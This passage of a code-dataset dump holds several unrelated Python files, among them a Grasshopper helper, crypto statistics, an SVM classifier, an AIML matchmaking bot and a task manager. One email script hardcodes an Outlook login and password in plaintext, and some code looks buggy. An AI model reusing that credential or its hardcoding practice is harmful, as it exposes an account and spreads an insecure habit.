'before draw',ghenv.LocalScope.GeoOut\n draw()\n #print \"final\",ghenv.LocalScope.GeoOut\nclass Processing:\n \"store the runing state of every instance\"\n count = 0\n def __init__(self,ghenv):\n Processing.count += 1\n print(\"create new p, %s in total\"%(Processing.count))\n self.env = ghenv\n # placeholder for instance, can be deleted\n self.STYLE = Style()\n self.STYLESTACK = []\n self._CPLANESTACK = []\n self.CPLANE = Plane.WorldXY\n self.AUTO_DISPLAY = True\n self.GEOMETRY_OUTPUT = True\n self.COLOR_OUTPUT = False\n self.GeoOut = ghenv.LocalScope.GeoOut = DataTree[object]()\n self.ColorOut = ghenv.LocalScope.ColorOut = DataTree[Color]()\n self.INFO = Info()\n self._SHAPESTACK = []\n def initialize(self,name = 'processing',autodisplay = True,geometry_output = True,color_output = False):\n # initilize placeholder\n global INFO,AUTO_DISPLAY,\\\n CPLANE,_CPLANESTACK,\\\n STYLE,STYLESTACK,\\\n GeoOut,ColorOut,\\\n GEOMETRY_OUTPUT,COLOR_OUTPUT,\\\n _SHAPESTACK\n INFO = Info()\n INFO.TIME = time.clock()\n _CPLANESTACK = []\n CPLANE = Plane.WorldXY\n _SHAPESTACK = []\n STYLESTACK = []\n STYLE = Style()\n AUTO_DISPLAY = autodisplay\n GEOMETRY_OUTPUT = geometry_output\n COLOR_OUTPUT = color_output\n GeoOut = self.env.LocalScope.GeoOut\n ColorOut = self.env.LocalScope.ColorOut\n _clearOutput()\n get_class(self.env)\n recive_from_gh(self.env)\n print(\"environment was reseted\")\n def switch(self):\n # retain this instance's envonriment\n global INFO,AUTO_DISPLAY,\\\n CPLANE,_CPLANESTACK,\\\n STYLE,STYLESTACK,\\\n GeoOut,ColorOut,\\\n GEOMETRY_OUTPUT,COLOR_OUTPUT,\\\n _SHAPESTACK\n CPLANE = self.CPLANE\n _CPLANESTACK = self._CPLANESTACK\n STYLE = self.STYLE\n STYLESTACK = self.STYLESTACK\n INFO = self.INFO\n #! 
why are these different?\n        GeoOut = self.env.LocalScope.GeoOut = self.GeoOut\n        ColorOut = self.env.LocalScope.ColorOut = self.ColorOut\n        GEOMETRY_OUTPUT = self.GEOMETRY_OUTPUT\n        COLOR_OUTPUT = self.COLOR_OUTPUT\n        AUTO_DISPLAY = self.AUTO_DISPLAY\n        _SHAPESTACK = self._SHAPESTACK\n        recive_from_gh(self.env)\n    def __del__(self):\n        # object defines no __del__, so only the instance counter needs updating here\n        Processing.count -= 1\n","repo_name":"ForestoShen/processing.gh","sub_path":"pgh/new_core.py","file_name":"new_core.py","file_ext":"py","file_size_in_byte":20374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15406072776","text":"\"\"\"\nThis module contains the main statistical functions of Pandas:\n - variation\n - ath\n - correlation\n-----------------------------------------------------------------------------------------------\n\"\"\"\n\nimport numpy as np, pandas as pd\nfrom datetime import datetime\nfrom IPython.display import display\n\ndef variation(dataframes):\n    \"\"\"\n    Note. Currently, this function only works for a Daily-based Analysis.\n\n    INPUT PARAMETERS\n    - A list of Dataframes (as a Dictionary).\n    \n    OUTPUT PARAMETERS\n    - The percentage variation of prices in a new dataframe (one day, one week, one month, one year).\n    -----------------------------------------------------------------------------------------------\n    \"\"\"\n\n    df_columns = []\n    for dataframe in dataframes:\n        df = dataframe[\"df\"]\n        currency = dataframe[\"from_currency\"]\n        \n        var_df = {\"Day (%)\": [], \"Week (%)\": [], \"Month (%)\": [], \"Year (%)\": []}\n\n        for time in (1, 7, 30, 365): # A Series for each currency will be created\n            if time == 1:\n                period = \"Day (%)\"\n            elif time == 7:\n                period = \"Week (%)\"\n            elif time == 30:\n                period = \"Month (%)\"\n            elif time == 365:\n                period = \"Year (%)\"\n            \n            s_value = df.loc[:,\"Close\"]\n            perc_var = s_value.pct_change(periods=time)[time] # pct_change returns the relative change between closings `time` rows apart\n            \n            var_df[period] = np.round(-perc_var*100,2)\n\n        df_columns.append(pd.Series(var_df, name=currency)) # Each Series is appended to a List\n    new_df = pd.concat(df_columns, axis=1) # Then, the list of Series is concatenated in a DataFrame\n    new_df.index.name = \"Variation\"\n    return display(new_df)\n\ndef ath(dataframe):\n    \"\"\"\n    INPUT PARAMETERS\n    - A Dataframe (as a Dictionary).\n    \n    OUTPUT PARAMETERS\n    - The all-time-high value recorded and the day in which the ATH was reached.\n    -----------------------------------------------------------------------------------------------\n    \"\"\"\n\n    df = dataframe[\"df\"]\n    currency = dataframe[\"from_currency\"]\n\n    max_value = df.loc[:,\"High\"].max()\n    data_max = df[df.loc[:,\"High\"]==max_value].index[0].strftime(\"%Y-%m-%d\")\n    return print(f\"\\nThe highest value recorded for {currency} is:\\t{np.round(max_value,2).astype(str).rjust(10)} €\\tin {data_max}\")\n\ndef correlation(dataframe):\n    \"\"\"\n    INPUT PARAMETERS\n    - A Dataframe (as a Dictionary).\n    \n    OUTPUT PARAMETERS\n    - The correlation between the price of a currency and its market capitalization.\n    -----------------------------------------------------------------------------------------------\n    \"\"\"\n\n    df = dataframe[\"df\"]\n    currency = dataframe[\"from_currency\"]\n\n    s1 = df.loc[:,[\"Open\", \"Close\"]].aggregate(func=\"mean\", axis=1)\n    s2 = df.loc[:,\"Volume\"]\n    corr = np.round(s1.corr(s2), 3)\n\n    if corr < 0.3:\n        corr_result = f\"NO correlation between value and market capitalization of \"\n    elif corr < 0.6:\n        corr_result = f\"a MEDIUM correlation between value and market capitalization of \"\n    elif corr < 0.9:\n        corr_result = f\"a STRONG correlation between value and market capitalization of \"\n    else:\n        corr_result = f\"a FULL correlation between value and market capitalization of \"\n    \n    return print(f\"\\nThere is {corr_result}{currency}:\\t{corr}\")\n\ndef disp(dataframe):\n    \"\"\"\n    This function was made to display the DataFrame correctly.\n\n    INPUT PARAMETERS\n    - A Dataframe (as a Dictionary).\n    \n    OUTPUT PARAMETERS\n    - The Dataframe.\n    -----------------------------------------------------------------------------------------------\n    \"\"\"\n\n    df = dataframe[\"df\"]\n    return display(df)\n\ndef stat_func(dataframe):\n    \"\"\"\n    This function returns the median, mean and standard deviation of the opening price for the selected currency\n\n    INPUT PARAMETERS\n    - Dataframe (as a Dictionary)\n\n    OUTPUT PARAMETERS\n    - Statistical parameters (median, mean and standard deviation)\n    - Mean price value over the years\n    \"\"\"\n\n    df = dataframe[\"df\"]\n    currency = dataframe[\"from_currency\"]\n\n    print(f\"\\nMain statistical parameters for {currency} opening values\")\n    display(df[\"Open\"].aggregate(func=[\"median\", \"mean\", \"std\"]).to_frame())\n\n    print(f\"\\nMean {currency} price year over year has been:\")\n    display(df[\"Open\"].groupby([df.index.year]).mean())\n    return None","repo_name":"gtroisi/crypto-chart-visualization","sub_path":"package/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
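`variation` and `correlation` above lean on two pandas one-liners worth isolating: `Series.pct_change(periods=k)` for the k-step relative change and `Series.corr` for Pearson correlation. A tiny standalone illustration with synthetic prices (not exchange data):

import pandas as pd

close = pd.Series([100.0, 102.0, 101.0, 105.0])
print(close.pct_change(periods=1))  # NaN, 0.02, -0.0098..., 0.0396...
volume = pd.Series([10.0, 14.0, 11.0, 15.0])
print(close.corr(volume))           # Pearson correlation of the two series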
of \"\n elif corr < 0.6:\n corr_result = f\"a MEDIUM correlation between value and market capitalization of \"\n elif corr < 0.9:\n corr_result = f\"a STRONG correlation between value and market capitalization of \"\n else:\n corr_result = f\"a FULL correlation between value and market capitalization of \"\n \n return print(f\"\\nThere is {corr_result}{currency}:\\t{corr}\")\n\ndef disp(dataframe):\n \"\"\"\n This function was made to display correctly the DataFrame.\n\n INPUT PARAMETERS\n - A Dataframe (as a Dictionary).\n \n OUTPUT PARAMETERS\n - The Dataframe.\n -----------------------------------------------------------------------------------------------\n \"\"\"\n\n df = dataframe[\"df\"]\n return display(df)\n\ndef stat_func(dataframe):\n \"\"\"\n This functions returns the Median, Mean and Deviation Standard for opening price for the selected currency\n\n INPUT PARAMETERS\n - Dataframe (as a Dictionary)\n\n OUTPUT PARAMETERS\n - Statistical parameters (Median, Mean and Deviation Standard)\n - Mean price value over years\n \"\"\"\n\n df = dataframe[\"df\"]\n currency = dataframe[\"from_currency\"]\n\n print(f\"\\nMain statistical parameters for {currency} opening values\")\n display(df[\"Open\"].aggregate(func=[\"median\", \"mean\", \"std\"]).to_frame())\n\n print(f\"\\nMean {currency} price year over years has been:\")\n display(df[\"Open\"].groupby([df.index.year]).mean())\n return None","repo_name":"gtroisi/crypto-chart-visualization","sub_path":"package/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15498756805","text":"class Solution:\n def isPalindrome(self, s: str) -> bool:\n left = 0\n rght = len(s) - 1\n\n while left < rght:\n while left < rght and not (s[left].isalpha() or s[left].isnumeric()): \n left += 1\n while left < rght and not (s[rght].isalpha() or s[rght].isnumeric()): \n rght -= 1\n\n if s[left].lower() != s[rght].lower(): return False\n\n left += 1\n rght -= 1\n \n return True","repo_name":"Ahmad-Abdalmageed/Problem-Solving","sub_path":"LeetCodeSolutions/problems/valid_palindrome/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"24147233157","text":"from sklearn import svm\nimport numpy as np\nfrom sklearn.model_selection import KFold, cross_val_score\n\n\ndc_feas_filename = 'dataset/dc_feas.txt'\ndcglobal_feas_filename = 'dataset/dcglobal_feas.txt'\nreho_feas_filename = 'dataset/reho_feas.txt'\nfalff_feas_filename = 'dataset/falff_feas.txt'\ndc_feas_data = np.loadtxt(dc_feas_filename, dtype=np.float32)\ndcglobal_feas_data = np.loadtxt(dcglobal_feas_filename, dtype=np.float32)\nreho_feas_data = np.loadtxt(reho_feas_filename, dtype=np.float32)\nfalff_feas_data = np.loadtxt(falff_feas_filename, dtype=np.float32)\nprint(dcglobal_feas_data.shape)\n# exit()\ndata = np.zeros([dcglobal_feas_data.shape[0], dcglobal_feas_data.shape[1], 4], dtype=float,order='C')\ndata[:,:,0] = dc_feas_data\ndata[:,:,1] = dcglobal_feas_data\ndata[:,:,2] = reho_feas_data\ndata[:,:,3] = falff_feas_data\nprint('load data end...')\n\nk_fold = KFold(n_splits=10)\ntrain = []\ntest = []\naccuracys = []\nfor train_indices, test_indices in k_fold.split(data):\n train = data[train_indices]\n test = data[test_indices]\n\n train_labels = train[:, 0, 0].reshape(train.shape[0], 1, 1)\n train_feas = train[:, 1:, :]\n 
test_labels = test[:, 0, 0]\n    test_feas = test[:, 1:, :].reshape(test.shape[0], -1)\n    clf = svm.LinearSVC()\n    re = clf.fit(train_feas, train_labels)\n    print('svm_multi fit end')\n    predict = 0\n    for i in range(test_feas.shape[0]):\n        a = clf.predict([test_feas[i]])\n        if a[0] == test_labels[i]:\n            predict += 1\n    accuracy = float(predict/test_feas.shape[0])\n    accuracys.append(accuracy)\n    print(accuracy)\nprint(np.mean(accuracys))\n\n","repo_name":"DoubleYing/medicial_prediction","sub_path":"svm_multi.py","file_name":"svm_multi.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"32543078234","text":"import re\nfrom collections import Counter\n\n\ndef expand(polymer, rules):\n    i = 0\n    new_polymer = \"\"\n    for i in range(len(polymer)):\n        substr = polymer[i : i + 2] if i < (len(polymer) - 1) else polymer[i]\n        if substr in rules:\n            new_polymer += substr[0] + rules[substr]\n        else:\n            new_polymer += substr[0]\n    return new_polymer\n\n\ndef expand_ntimes(init_polymer, rules, n):\n    polymer = init_polymer\n    for _ in range(n):\n        polymer = expand(polymer, rules)\n    return polymer\n\n\n\"\"\"\nFor part 2 thanks to\nhttps://dev.to/qviper/advent-of-code-2021-python-solution-day-14-4395\n\"\"\"\n\n\ndef count_expand(polymer, rules, n):\n    tmp_poly = Counter(a + b for a, b in zip(polymer, polymer[1:]))\n    chars = Counter(polymer)\n\n    for _ in range(n):\n        tmp = Counter()\n        for (c1, c2), value in tmp_poly.items():\n            mc = rules[c1 + c2]\n            tmp[c1 + mc] += value\n            tmp[mc + c2] += value\n            chars[mc] += value\n        tmp_poly = tmp\n    return max(chars.values()) - min(chars.values())\n\n\ndef least_most_common(string):\n    counter = Counter(string)\n    common = Counter(string).most_common(len(string))\n    return common[0], common[-1]\n\n\nwith open(\"input.txt\") as file:\n    contents = file.read()\n    contents = contents.split(\"\\n\\n\")\n    polymer = contents[0]\n    rules = re.findall(\"(\\\\w+)\\\\s+->\\\\s+(\\\\w+)\", contents[1])\n    rules = {k: v for k, v in rules}\n    expansion = expand_ntimes(polymer, rules, 10)\n    lmc = least_most_common(expansion)\n    print(\n        f\"The difference between most and least common at 10 steps is {lmc[0][1] - lmc[1][1]}\"\n    )\n\n    diff = count_expand(polymer, rules, 40)\n    print(f\"The difference between most and least common at 40 steps is {diff}\")\n","repo_name":"nhrade/advent-of-code","sub_path":"day14/polymer.py","file_name":"polymer.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"8005081234","text":"import smtplib\nfrom email.message import EmailMessage\n\nemail = EmailMessage()\nemail['from'] = 'erictestandopython@hotmail.com'\nemail['to'] = 'estorani_41@hotmail.com'\nemail['subject'] = 'Email project test'\n\nemail.set_content('conteudo do email, vamos ver')\n\nwith smtplib.SMTP(host='smtp-mail.outlook.com', port=587) as smtp:\n    smtp.ehlo()\n    smtp.starttls()\n    smtp.login('erictestandopython@hotmail.com', 'Testandopython123')\n    smtp.send_message(email)\n\n    print('deu certo')\n\n\n# first attempt failed\n# when I changed email['from'] to an actual email address it worked; when I put my name there, it did not\n","repo_name":"pie0my/Email-Project","sub_path":"sendingemail.py","file_name":"sendingemail.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72918046292","text":"from django import forms\nfrom 
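The Counter-of-pairs trick in `count_expand` above is what makes 40 steps tractable: the string doubles every step, but the number of distinct pairs is bounded by the rule set, so each step costs O(|rules|). A small usage sketch with a made-up rule table (not the puzzle input; every reachable pair must have a rule, since `count_expand` indexes `rules` unconditionally):

toy_rules = {'AA': 'B', 'AB': 'C', 'AC': 'B',
             'BA': 'C', 'BB': 'C', 'BC': 'A',
             'CA': 'B', 'CB': 'A', 'CC': 'A'}
# Both paths agree: max minus min letter count after one step is 1
print(count_expand('AAB', toy_rules, 1))    # 1
grown = expand_ntimes('AAB', toy_rules, 1)  # 'ABACB'
print(max(Counter(grown).values()) - min(Counter(grown).values()))  # 1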
database.models import User,Comment, Reply\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.contrib.auth import authenticate\n\n#The form that appears when a user clicks on comment. Only need a text field for a new comment\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ( 'text',)\n widgets = {\n 'text' : forms.Textarea(attrs={'class':'form-control'}),\n }\n\n#The form for whenever the user clicks on reply to a comment. Only need a text field for the reply\nclass ReplyForm(forms.ModelForm):\n class Meta:\n model = Reply\n fields = ( 'text',)\n widgets = {\n 'text' : forms.Textarea(attrs={'class':'form-control'}),\n }","repo_name":"DanielSimonChin/garage-sale-website","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5285023175","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\n\n\ndef main():\n chatbot = ChatBot('New Bot')\n trainer = ChatterBotCorpusTrainer(chatbot)\n trainer.train(\"chatterbot.corpus.english\")\n print(chatbot.get_response(\"Hello, how are you today?\"))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"October-Studios/Discord-Stats-Bot","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19644146257","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport json\nimport aiml\nimport pkg_resources\nimport random\nimport requests\nimport sys\n\nsys.path.append(\"...\")\nfrom matchmaking_responder import matchmaking_responder\n\nmatchmaking_strings = {\"matchmaking_like\", \"matchmaking_dislike\", \"matchmaking_forget_like\",\n \"matchmaking_forget_dislike\", \"matchmaking_matchmake\"}\n\nclass matchmaking():\n def __init__(self, responder):\n print('[BOTS/MATCHMAKING] Starting...')\n\n self.aiml = aiml.Kernel()\n self.aiml.learn(\"bots/matchmaking/std-startup.xml\")\n self.aiml.respond(\"load aiml b\")\n\n self.matchmaking_responder = matchmaking_responder(responder)\n\n self.aiml_affirm = aiml.Kernel()\n self.aiml_affirm.learn(\"bots/matchmaking/std-startup-affirm.xml\")\n self.aiml_affirm.respond(\"load aiml b\")\n\n self.responder = responder\n\n self.utterance = ''\n self.mode = 0\n\n self.handoffLike = ''\n self.handoffStatus = 0\n\n self.forename_1, self.forename_2 = self.responder.getNames()\n\n self.lockcode = 1\n\n def check(self, intent, utterance, forename, driver):\n print('[BOTS/MATCHMAKING] Responding...')\n\n self.forename_1, self.forename_2 = self.responder.getNames()\n self.utterance = utterance\n\n self.aiml.respond(self.utterance)\n responder = self.aiml.getPredicate('responder')\n\n print('[BOTS/MATCHMAKING] Routing:', responder)\n\n if self.handoffStatus == 1:\n self.matchmaking_like_process_2()\n return -1\n else:\n if driver == 1:\n self.drivers()\n return self.lockcode\n else:\n if responder == \"matchmaking_like\":\n print(\"[BOTS/MATCHMAKING] matchmaking_like\")\n self.matchmaking_like()\n return self.lockcode\n\n elif responder == \"matchmaking_dislike\":\n print(\"[BOTS/MATCHMAKING] matchmaking_dislike\")\n self.matchmaking_dislike()\n return self.lockcode\n\n elif responder == \"matchmaking_forget_like\":\n print(\"[BOTS/MATCHMAKING] 
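The pattern the matchmaking bot below relies on throughout, loading AIML categories once and then reading predicates back after each respond() call, reduces to a few python-aiml calls. A stripped-down sketch (the .xml/.aiml category contents are assumptions, mirroring the bootstrap files named in that module):

import aiml

kernel = aiml.Kernel()
kernel.learn('std-startup.xml')  # bootstrap file mapping a trigger phrase to the .aiml set
kernel.respond('load aiml b')    # fire that trigger so the categories get learned

kernel.respond('I like hiking')            # categories set predicates as a side effect
intent = kernel.getPredicate('responder')  # e.g. 'matchmaking_like', used for routing
captured = kernel.getPredicate('like')     # wildcard capture, e.g. 'hiking'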
matchmaking_forget_like\")\n self.matchmaking_forget_like()\n return self.lockcode\n\n elif responder == \"matchmaking_forget_dislike\":\n print(\"[BOTS/MATCHMAKING] matchmaking_forget_dislike\")\n self.matchmaking_forget_dislike()\n return self.lockcode\n\n elif responder == \"matchmaking_matchmake\":\n print(\"[BOTS/MATCHMAKING] matchmaking_matchmake\")\n self.matchmaking_matchmake()\n return self.lockcode\n\n elif responder == \"matchmaking_enquire\":\n print(\"[BOTS/MATCHMAKING] matchmaking_enquire\")\n self.matchmaking_enquire()\n return self.lockcode\n \n else:\n response = \"Sorry, I didn't quite get that. Please try a different phrase.\"\n self.responder.respond(response)\n self.drivers()\n return self.lockcode\n\n def matchmaking_like(self):\n self.aiml.respond(self.utterance)\n predicate = self.aiml.getPredicate('like')\n\n url = \"http://localhost:3000/api/person/add/likeDislike\"\n\n payload = \"likeDislike=true&thing=\" + predicate + \"&forename=\" + self.forename_1.title()\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"c4a150d4-eb1a-431d-b68a-1fc99aecf28d\"\n }\n\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n\n # Check if this is a common like, discusses if true\n commonLikeAvailable, text = self.quickCheck(predicate)\n\n test = random.uniform(0, 1)\n\n if commonLikeAvailable:\n if test > 0.5:\n # Check is user wants to know more\n self.matchmaking_like_process_1(predicate)\n else:\n response = text\n self.responder.respond(response)\n else:\n self.matchmaking_responder.responder_like(predicate)\n\n sufficientLikes = self.checkLikes()\n if sufficientLikes == True and self.handoffStatus == 0:\n self.driversMatchmaking()\n elif sufficientLikes == False and self.handoffStatus == 0:\n self.drivers()\n\n def matchmaking_dislike(self):\n self.aiml.respond(self.utterance)\n predicate = self.aiml.getPredicate('dislike')\n\n url = \"http://localhost:3000/api/person/add/likeDislike\"\n\n payload = \"likeDislike=false&thing=\" + predicate + \"&forename=\" + self.forename_1\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"c4a150d4-eb1a-431d-b68a-1fc99aecf28d\"\n }\n\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n\n self.matchmaking_responder.responder_dislike(predicate)\n self.drivers()\n\n def matchmaking_forget_like(self):\n self.matchmaking_responder.responder_forget_like()\n\n def matchmaking_forget_dislike(self):\n self.matchmaking_responder.responder_forget_dislike()\n\n def matchmaking_matchmake(self):\n self.aiml.respond(self.utterance)\n friend = self.aiml.getPredicate('friend')\n thing = self.aiml.getPredicate('thing')\n matchmake = self.aiml.getPredicate('matchmake')\n\n sufficientLikes = self.checkLikes()\n if sufficientLikes == False:\n self.promptLikes()\n return\n\n if matchmake == \"GENERAL\":\n url = \"http://localhost:3000/api/person/commonlikes\"\n\n payload = \"forename_1=\" + self.forename_1 + \"&forename_2=\" + self.forename_2 + \"&type=general\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"5777f647-b96b-4f17-8d71-906e1e3ae6b2\"\n }\n\n people = requests.request(\"POST\", url, data=payload, headers=headers)\n people = json.loads(str(people.text))\n\n myLikes = []\n friends = []\n things = []\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n 
if(person[\"forename\"] == self.forename_1):\n myLikes.append(like[\"thing\"])\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(like[\"thing\"] in myLikes and person[\"forename\"] != self.forename_1):\n friends.append(person[\"forename\"])\n things.append(like[\"thing\"])\n\n if len(friends) < 2:\n self.matchmaking_responder.responder_matchmake_not_found()\n else:\n rand = random.randint(0, len(friends)-1)\n self.matchmaking_responder.responder_matchmake_found(friends[rand], things[rand])\n self.driversMatchmaking()\n\n elif matchmake == \"SPECIFIC FRIEND\":\n self.forename_2 = friend.title()\n self.responder.setNames(self.forename_1, self.forename_2)\n\n url = \"http://localhost:3000/api/person/commonlikes\"\n\n payload = \"forename_1=\" + self.forename_1 + \"&forename_2=\" + self.forename_2 + \"&type=specific_friend\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"5777f647-b96b-4f17-8d71-906e1e3ae6b2\"\n }\n\n likes = requests.request(\"POST\", url, data=payload, headers=headers)\n likes = json.loads(str(likes.text))\n\n if len(likes[\"commonLikes\"]) > 1:\n rand = random.randint(0, len(likes[\"commonLikes\"])-1)\n self.matchmaking_responder.responder_matchmake_found_specific_friend(likes[\"commonLikes\"][rand])\n else:\n response = \"Sorry, you do not have anything in common with \" + self.forename_2\n self.responder.respond(response)\n \n elif matchmake == \"SPECIFIC THING\":\n self.thing = thing\n\n url = \"http://localhost:3000/api/person/commonlikes\"\n\n payload = \"forename_1=\" + self.forename_1 + \"&forename_2=\" + self.forename_2 + \"&type=general\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"5777f647-b96b-4f17-8d71-906e1e3ae6b2\"\n }\n\n people = requests.request(\"POST\", url, data=payload, headers=headers)\n people = json.loads(str(people.text))\n\n friends = []\n things = []\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(like[\"thing\"].lower() == self.thing.lower() and person[\"forename\"] != self.forename_1):\n friends.append(person[\"forename\"])\n things.append(like[\"thing\"])\n\n if len(friends) >= 1:\n rand = random.randint(0, len(friends)-1)\n self.matchmaking_responder.responder_matchmake_found(friends[rand], things[rand])\n else:\n response = \"Sorry, no one else you know likes \" + thing\n self.responder.respond(response)\n\n else:\n print('[BOTS/MATCHMAKING] Invalid responder value. 
Check bots/matchmaking/aiml/*.aiml')\n\n def matchmaking_enquire(self):\n self.aiml.respond(self.utterance)\n friend = self.aiml.getPredicate('friend')\n\n url = \"http://localhost:3000/api/person/likes\"\n\n payload = \"forename=\" + friend.title()\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"c29574dd-a784-474d-8c8f-ba83177e0448\"\n }\n\n likes = requests.request(\"POST\", url, data=payload, headers=headers)\n likes = json.loads(str(likes.text))\n\n count = 0\n\n rand = random.randint(0, len(likes[\"likes\"])-1)\n self.matchmaking_responder.responder_matchmake_enquire(friend, likes[\"likes\"][rand][\"thing\"])\n\n def drivers(self):\n self.matchmaking_responder.responder_drivers()\n\n def driversMatchmaking(self):\n self.matchmaking_responder.responder_driversMatchmaking()\n\n def checkLikes(self):\n url = \"http://localhost:3000/api/person/likes\"\n\n payload = \"forename=\" + self.forename_1\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"c29574dd-a784-474d-8c8f-ba83177e0448\"\n }\n\n likes = requests.request(\"POST\", url, data=payload, headers=headers)\n likes = json.loads(str(likes.text))\n\n count = 0\n for likes in likes[\"likes\"]:\n count = count + 1\n \n if count > 2:\n return True\n else:\n return False\n\n def quickCheck(self, like):\n url = \"http://localhost:3000/api/person/commonlikes\"\n\n payload = \"forename_1=\" + self.forename_1 + \"&type=general\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"5777f647-b96b-4f17-8d71-906e1e3ae6b2\"\n }\n\n people = requests.request(\"POST\", url, data=payload, headers=headers)\n people = json.loads(str(people.text))\n\n myLikes = []\n friends = []\n things = []\n\n resp = 'null'\n canRespond = False\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(person[\"forename\"] == self.forename_1):\n myLikes.append(like[\"thing\"])\n\n for person in people[\"allPeople\"]:\n for like in person[\"likesDislikes\"]:\n if(like[\"thing\"] in myLikes and person[\"forename\"] != self.forename_1):\n friends.append(person[\"forename\"])\n things.append(like[\"thing\"])\n\n if len(friends) > 2:\n rand = random.randint(0, len(friends)-1)\n resp = 'It looks like you and ' + friends[rand] + ' both like ' + things[rand]\n canRespond = True\n \n return canRespond, resp\n\n def matchmaking_like_process_1(self, like):\n self.handoffLike = like\n self.handoffStatus = 1\n\n affirmations = []\n affirmation = 'Would you like me to tell you more about ' + like + '?'\n affirmations.append(affirmation)\n affirmation = 'Should I talk some more about ' + like + '?'\n affirmations.append(affirmation)\n\n rand = random.randint(0, len(affirmations)-1)\n resp = affirmations[rand]\n self.responder.respond(resp)\n\n def matchmaking_like_process_2(self):\n self.aiml_affirm.respond(self.utterance)\n predicate = self.aiml_affirm.getPredicate('affirm')\n\n if predicate == \"YES\":\n self.matchmaking_like_process_3()\n elif predicate == \"NO\":\n self.handoffStatus = 0\n self.drivers()\n else:\n self.matchmaking_like_process_1(self.handoffLike)\n print('invalid case')\n\n def matchmaking_like_process_3(self):\n self.handoffStatus = 0\n self.responder.handoff(self.handoffLike)\n\n print('Handoff to Alana would happen here.')\n\n def promptLikes(self):\n 
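# Called when checkLikes() fails; delegates to the responder to prompt the user for more likes before matchmaking.\n        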
self.matchmaking_responder.responder_promptLikes()","repo_name":"RainAlexandra/Pepper-AssistedLiving","sub_path":"NLU/bots/matchmaking/matchmaking.py","file_name":"matchmaking.py","file_ext":"py","file_size_in_byte":14024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"21826753148","text":"\"\"\"Program to create a task manager to help a company assign tasks, register users, view all tasks,\r\nview the tasks of a specific user and display statistics if user is the admin\"\"\"\r\n\r\n# PLEASE OPEN MY OVERVIEW FILES IN VS CODE, FOR SOME REASON THE NUMBERS ARENT LINED UP WHEN I OPEN THE FILES IN DROPBOX BUT THEY WERE ALIGNED ON MY SIDE\r\n\r\n#=====importing libraries=====================================================\r\nPURPLE = '\\033[95m'\r\nCYAN = '\\033[96m'\r\nDARKCYAN = '\\033[36m'\r\nBLUE = '\\033[94m'\r\nGREEN = '\\033[92m'\r\nYELLOW = '\\033[93m'\r\nRED = '\\033[91m'\r\nBOLD = '\\033[1m'\r\nUNDERLINE = '\\033[4m'\r\nEND = '\\033[0m'\r\nCBEIGE2 = '\\33[96m'\r\n\r\nfrom datetime import datetime\r\n\r\n#====Functions===================================================================\r\n\r\ndef reg_user():\r\n while True:\r\n if user == 'admin':\r\n print(f'\\n════════════════ {CYAN}Register A New User{END} ════════════════\\n')\r\n user_file = open('T26 Capstone 3/user.txt', 'a')\r\n new_user = input('Please enter a new username: \\t\\t')\r\n new_password = input('Please enter a password: \\t\\t')\r\n conf_password = input('Please re-enter your chosen password: \\t')\r\n if new_user in user_list:\r\n print(f'\\n{RED}This user already exists, please enter a different username{END}')\r\n continue\r\n elif new_user not in user_list and new_password == conf_password:\r\n user_file.write(f'\\n{new_user}, {new_password}')\r\n break\r\n else:\r\n print(f'\\n{RED}Your passwords do not match, please try again{END}')\r\n continue\r\n else:\r\n print(f'\\n{RED}You are not authorised to register new users, please select a different option{END}\\n')\r\n continue 